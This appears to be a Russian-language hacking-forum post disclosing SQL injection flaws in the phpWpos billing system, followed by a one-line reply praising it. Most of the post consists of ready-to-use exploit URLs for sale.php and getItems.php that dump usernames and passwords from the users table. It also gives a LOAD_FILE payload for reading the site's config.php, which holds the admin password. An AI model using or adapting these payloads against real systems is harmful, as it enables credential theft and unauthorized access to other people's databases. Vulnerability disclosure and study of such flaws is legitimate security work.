![]() |
phpWpos bugs
{Некоторые уязвимости в биллинг системе phpWpos}
Офиц. сайт: http://phpwpos.sourceforge.net/ 1)Sql inj в скрипте sale.php PHP код:
Код:
http://localhost/wostest/sale.php?id=2+union+select+concat(password,0x3a,username),2,3+from+users/*PHP код:
Эксплойт: Код:
http://localhost/wostest/getItems.php?category=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a3a3a3a,id,first_name,last_name,username,password,type)+from+users/*Парль администратора в БД не содержится, он прописан в конфиге. Для эксплуатации уязвимости требуется: file_priv = Y Эксплойт http://localhost/wostest/getItems.php?category=-1+union+select+1,2,3,4,5,6,LOAD_FILE('\path\site\c onfig.php')/* |
Статья супер!
|
| Время: 07:34 |